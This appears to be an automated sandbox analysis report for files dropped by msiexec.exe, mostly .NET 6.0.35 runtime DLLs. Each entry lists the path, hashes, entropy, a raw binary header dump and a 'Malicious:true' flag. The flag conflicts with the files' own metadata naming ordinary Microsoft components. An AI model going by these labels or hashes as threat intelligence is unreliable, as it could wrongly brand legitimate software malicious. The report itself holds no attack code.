                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...j..........." .....H...........................................................+....`...@......@............... ......................................H........T...)...p..p.......T...............................................................H............text....F.......H.................. ..`.data........`.......J..............@....reloc..p....p.......R..............@..B............................................0...........................p.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.480267391585499
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:sBfoK6fKUINsWW/z2rg8Z61rvZqhwFLXFMjKYuPt3FClT9zL:sBfoWUINcz2r1GqhwFLFMjKPPt1i5zL
                                                                                                                                                                                                                                                                                                                                  MD5:88512250F0E7ED903BFA2A457CCFBE9F
                                                                                                                                                                                                                                                                                                                                  SHA1:9020853BFD6C297AFCECDD12AF6014A57111DE7A
                                                                                                                                                                                                                                                                                                                                  SHA-256:BDA3738F6C45B50862D09DDE795B4FD27E31815DDC8918A16F63B2C4BACA5FB2
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4419F8431B756B4262195013068E4E851A17B49972C9E3112BAF2C22EDF795E82C614A4B2BBA0613E60E873FC8093EA302E18F68B8E85FFB3504D04A9DBEAA9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...O............." ......................................................................`...@......@............... ....................................... ..P........)..............T...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...I.n.t.e.r.o.p.S.e.r.v.i.c.e.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Intrinsics.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.677337531505305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:tTBV9nrJAlvWmpLWNpWjA6Kr4PFHnhWgN7agWySnE8RwX01k9z3AeJR7oA5k:D1QvWmpLWNYA6VFHRN7+E9R9zrJR7o7
                                                                                                                                                                                                                                                                                                                                  MD5:514CEF61159B16DE1FDAED7056A3E0D9
                                                                                                                                                                                                                                                                                                                                  SHA1:7ED1FB6A569A7C9E8507876A094334CF9F3B0969
                                                                                                                                                                                                                                                                                                                                  SHA-256:A421933A4B9EEA4170EE68EF1754DBA590970599CA2F5B52F92DE7B0DC2769AF
                                                                                                                                                                                                                                                                                                                                  SHA-512:4450BB36331EF7B9F08F7527E3C3509393CBD58CAA27B1BDD877204CF0934C684CB78D81231B94868524AC5F031AC3E8DF234F55567CDF54691510CB2184D6BE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............-... ........@.. ..............................~z....`.................................d-..W....@...................)...`.......,..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........ ......................P .......................................l....@..... 22....8..0..4|....."...~e._.=..x.?..1.....d.........*>]wD..3..g.f.."J...-.B.4..."w....S.|...z.a..G..6..7s.$.BSJB............v4.0.30319......`.......#~..<.......#Strings....$.......#GUID...4.......#Blob......................3................................9.............................p.........?.....g...................1.....1...}.1...4.1.....1...X.1...u.1.....1...(.1...O.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.727108508133854
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:UW0SQaRxxocuW5yGWLpWjA6Kr4PFHnhWgN7acW66NqPY00pyEuX01k9z3AL68ZIR:UUQW6JW5yGWLYA6VFHRN7fEpcR9zUU/
                                                                                                                                                                                                                                                                                                                                  MD5:2724E3263871899F2684D8B2432A370C
                                                                                                                                                                                                                                                                                                                                  SHA1:F5A9EDDFFC2BF60D77BB194BBDBB6CDF5D353A52
                                                                                                                                                                                                                                                                                                                                  SHA-256:69F2DA7C2A3EA6F0C742EBBDD422ECE10D050B982424773C9E07368E06401592
                                                                                                                                                                                                                                                                                                                                  SHA-512:329DF6407F7A69F85318D656092A5F78C78ACCA8F998290DBCB159E4D7E9F8616939E91536A94606F71DFDFD75B2E410D07CABB8D4B018F9A3122140DF1263A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{..........."!..0..............*... ........@.. ....................................`.................................8*..S....@...................)...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p*......H........ ......................P .............................................:..1.,c..D....p1..7.......Z.O..$.....*i.mCd7=w........ ....J..g....1:.V.Rv.M....F..}.h5........f)#&.c...,......vBSJB............v4.0.30319......`... ...#~..........#Strings............#GUID...........#Blob......................3..................................................,...4.,...p.....L.......R.........t.....l.....V.....V.................................................,...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Numerics.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):221960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.872789919122551
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:d1Bg53qlzkOGjMD1jUZVEJrSALXuDcWro1CS:jBgxqlz1GgDRKVEJOIuDcWcCS
                                                                                                                                                                                                                                                                                                                                  MD5:C1D83BB993CA11B212B0B44576DD31E3
                                                                                                                                                                                                                                                                                                                                  SHA1:E819306131C8FDEB9CF89DDB0C9DAAA5B517BF22
                                                                                                                                                                                                                                                                                                                                  SHA-256:CD2F87FC4EA7F88B52EB8521EDE7D36B80BB329FAA8DE163BC0C0491832D0F74
                                                                                                                                                                                                                                                                                                                                  SHA-512:29D3EA8C257893095C6B076F1F17D903A74EF7E7AD4AE52C87B7746168BEAB1D828D2EEB037FC1AF76C5CBC2A61629F04873248A96456340EFDAB1EE96341692
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" ......... ...............................................`......~t....`...@......@............... .......................................T..x....:...)...P......P...T...............................................................H............text...1........................... ..`.data...P....0......................@....reloc.......P.......6..............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...N.u.m.e.r.i.c.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):322824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.695090576962379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:5vZzvy5t66x3yEHAc1mZdOqZYqdKfR8wwWRwG/Y14CFYHQ9B7B:/vSiEHAc1mZ4q0uRawG+dz9B7B
                                                                                                                                                                                                                                                                                                                                  MD5:025DB3101A59BB29AFE8FCDC33D5590A
                                                                                                                                                                                                                                                                                                                                  SHA1:0AB913D0EEDAB18146897D866EBF785C78681439
                                                                                                                                                                                                                                                                                                                                  SHA-256:B7BA1AA2D0276DEDA176C1AD572C3C4FAD224FFCFEFC045896B52AD730673EB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:3E3B9CE99C4BAC8E4B00C38E93DE59EAFBD0651F03A5E25E51916D399318B958FDCAF95AB961688C1318E117727E1D12EA2C43F0EBF79E4E0126CB3B113B924C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....V..........." .....p...R............................................................`...@......@............... .......................................o...........)......(....&..T...............................................................H............text....n.......p.................. ..`.data....I.......J...r..............@....reloc..(...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...S.e.r.i.a.l.i.z.a.t.i.o.n...F.o.r.m.a.t.t.e.r.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.730609288657777
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kB9qNyVWbuPdB5W2YA6VFHRN7wYVMR9z2vn/:iayWudBzFClwv9zwn/
                                                                                                                                                                                                                                                                                                                                  MD5:686CD3BE26B4649484D56031B21627FC
                                                                                                                                                                                                                                                                                                                                  SHA1:4CE1F71FBCFAEE92A0D38F32BCACE1C4D077A488
                                                                                                                                                                                                                                                                                                                                  SHA-256:069AFF3EC1D53B0A2255DE6243A057E9B00AC6D01479F35382B2B16BB57A23A2
                                                                                                                                                                                                                                                                                                                                  SHA-512:9596C529CD67B37E7CBEEA03496B17DF4CD56D2519AB715D57290EADDA16D8CF72CD9F7A5E18AE10CA5787B856667BB9B05EC636C88DF1B4D8EEE2163FC3017D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O?..........."!..0.............~*... ........@.. ..............................UH....`.................................,*..O....@...................)...`......h)..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H........ ......................P ........................................_...DGw......GA..=..-G]V.....=.na........O.[.0.l'5d..a9.q4.+.*..v.2.cE.T...161..(O.........?.5..K. "....-...4.^y.'m..[.BSJB............v4.0.30319......`.......#~..|...d...#Strings............#GUID...........#Blob......................3............................................................3...........^.....a.......O.....O...w.O.....O.....O...w.O.....O.....O...G.O...I.........................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.471330473213999
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MHWFIBJBrW8trwhWKH0sdznMbKF+87makO2akSMHHDHEHsObEruYA6VFHRN7HqR4:MqCJBZtrelWW+8d8KnFClHG9ze
                                                                                                                                                                                                                                                                                                                                  MD5:A1968D6A862286C05F86EAC22F21B8C3
                                                                                                                                                                                                                                                                                                                                  SHA1:D23A410A8A4450EACE5AA230E088ACEB6743B29C
                                                                                                                                                                                                                                                                                                                                  SHA-256:938F43DB59DBED4F306492750DF1CA32B2F5F487AC00F1DCCF27830231F2DCB6
                                                                                                                                                                                                                                                                                                                                  SHA-512:8060EC092E97041AEC48E9F23BD27F8E8555161A74C213E182104E65F2B80E2285EB73F6A69EA4BFD8903936C59F958DE2F48AE297AF66942C6BE861B9C27DF6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....@...................................................p............`...@......@............... ...............................................H...)...`..(.......T...............................................................H............text....>.......@.................. ..`.data........P.......B..............@....reloc..(....`.......F..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...S.e.r.i.a.l.i.z.a.t.i.o.n...P.r.i.m.i.t.i.v.e.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.762030084243297
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:guYklmI8N5vBRMWsB4BBgWGYA6VFHRN72kFDR9z7WsKkR:OklmI8N55Ri6BBEFCldl9zn
                                                                                                                                                                                                                                                                                                                                  MD5:53330C1C8FD918CA2141C0039D72BC1B
                                                                                                                                                                                                                                                                                                                                  SHA1:51B86E844A3655398ED9DE18D7490429BB0F1E6E
                                                                                                                                                                                                                                                                                                                                  SHA-256:0F8A0BCEFBC1F0E854CFCDBA028C53C8D658B3CAA26706DE6D1BC89A92CB4C22
                                                                                                                                                                                                                                                                                                                                  SHA-512:D4F1CA15CE03EC02BD009B0D5E03612AF2C34C19E8D50F2CFE39C6CFD9C7D687CC95292F5A5548A11C7ECB3339BA816659BE535B6403B2F3BC955E8587DAE199
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0..............-... ........@.. ...............................v....`.................................p-..K....@...................)...`.......,..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........ ......................P .........................................].h......[..ja-R......Q....GD..>.U ...x..6.;...-.a.9.>_...J../.A...D.}Udr..mV......Q.....E.8.Sv..V7.Ov.5`.Z..XN.Q>EBSJB............v4.0.30319......`...d...#~......d...#Strings....(.......#GUID...8.......#Blob......................3..................................................f.....f...W.;.................Q.........=...........R.......................9.....k.....m.f.......................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6341633149040415
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:y6EvDj8NluLWgMM4BHWdYA6VFHRN7J/ecTR9z6Dw/:y6EvDj8NsPP4BGFClVzV9z2W
                                                                                                                                                                                                                                                                                                                                  MD5:C68962D082AF9B2AA66574EB7CC19E32
                                                                                                                                                                                                                                                                                                                                  SHA1:EB28F7AE0ADAB40F950098E6AC4C24EFA7A16031
                                                                                                                                                                                                                                                                                                                                  SHA-256:62C5827EB74A101342D3C02EC909B6F9F2CEF8C871A21AF93129BDAA16003EB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:99BB410F23E4FD2AD46F8ECAE38C881BBAB0A6252DEFB25EB53CFF659323586A28B269B1061B04E23D0433F4E62D8E4A5260C0E80DF5C79A6DC19C137E06B4C7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............0... ...@....... ..............................B.....`..................................0..O....@...................)...`......./..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H.......P ......................./......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob............T.........3....................................,.....................f.......t...............7.......t...=.t...M.t.....t...B.t.....t.....t.....t.....t...e.w...&.w...r.........................T.....T.....T...).T...1.T...9.T...A.T...I.T...Q.T...Y.T...a.T...i.T...q.T...y.T.....T. ...T.....T...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.818262385725449
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:YBV0jdpFKYl5f4bGRi2xVbcVT4p8JOaFCl6l9zPh:kedGYl5f4bGR3G04OWi63zZ
                                                                                                                                                                                                                                                                                                                                  MD5:B515896FEB8F4B378E9F6FEE22F5F1E6
                                                                                                                                                                                                                                                                                                                                  SHA1:348411DE58A4156B649EE9C6277B2735D88345D5
                                                                                                                                                                                                                                                                                                                                  SHA-256:6B9AF60B2B7947B7B960EF3012ADC7A81E5ACF6E990BC3FE6AF51CB13E07F91C
                                                                                                                                                                                                                                                                                                                                  SHA-512:9889D61E5F03A59B54E80D2DB49606D13DD5AFCF45E0EAEA4EFD34BF46C66FE30780A68DBD920C0C1424855AC51F62DD836D010902573113C8E93869DB6A9C09
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yU............"!..0..t..........^.... ........@.. ...............................l....`.....................................W.......X............~...)..........d...8............................................ ............... ..H............text...dr... ...t.................. ..`.rsrc...X............v..............@..@.reloc...............|..............@..B................@.......H........ ...p..................P ..........................................`.).v..v....2..#TU.eMX=.I..r...k@$.#...```.S.J...D5..........'..@......7...k.%Y........ 3*.j.......eV.{.3>..g....G.~|]iBSJB............v4.0.30319......`...l0..#~...0...=..#Strings.....m......#GUID....m......#Blob......................3................................T...............'.[3..".[3.....2...3....e.....>.. ....<3....<3....j!....j!....j!....j!....j!..q.j!....j!....j!..R.j!..&.[3..........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215336
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.694443379581404
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:LcFFAFBS7nsE9WXBeAJRAipIx7kgmlZnFW2iBeVICTiupU8TVUnVZ5PDMXZoKcQf:K7sE9kesRA2imlZo2XZcn3m
                                                                                                                                                                                                                                                                                                                                  MD5:9845B4D023FABDEFCFECDA062FC68781
                                                                                                                                                                                                                                                                                                                                  SHA1:DF17714A108EE4E81F8E0B32F3AECEA03ACB9157
                                                                                                                                                                                                                                                                                                                                  SHA-256:57F85C61E832FD5DDB91A3C161939CD8DB72A8A6DE449A83F5C3070E6DACF48D
                                                                                                                                                                                                                                                                                                                                  SHA-512:49F186BD9DA01A378D9DCB1D9EF575A653B0A6779F3196FE318E6C47661857BF2A15231B0FB552014D1F3DB7F04AB990B344DC7F354711ECB1321FE40BE16786
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...|..........." .........$...............................................@............`...@......@............... ......................................@W..p.... ..()...0.......#..T...............................................................H............text............................... ..`.data...n........ ..................@....reloc.......0......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):94480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.450155185151261
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:vv1N9Mf5d/pMIJ7nZUyOuX3Gpafbqb9/8kGOQwQ7rzUU3q2bP6vOVFp6i/3zi:vNnMf5dhbJ3OuX3GpEbq5hOVys3m
                                                                                                                                                                                                                                                                                                                                  MD5:4CD484994224EC26CC86A61743DBFE6B
                                                                                                                                                                                                                                                                                                                                  SHA1:1BE9B7AA319B5F20FCA74C98BF57758FF7FCEDB6
                                                                                                                                                                                                                                                                                                                                  SHA-256:BC4EDCFC6BB6D79E110FBA0D203D96B5436D99969AD71C76A423A79410378A0F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8CADDE72709AA52921C6175517B6DCC51D97D4207A1833A6071B876CFDC71BE0EFEF2CA65EB99E5B705A85E4F07CE363A0BBB55BC38C4BD6BE1483A5A871D6C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...T............." .....4...................................................p............`...@......@............... .......................................-..<....H...)...`..<...h...T...............................................................H............text...T2.......4.................. ..`.data...!....P.......6..............@....reloc..<....`.......F..............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...F.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...C.l.a.i.m.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...V.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):808712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.664977714687645
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
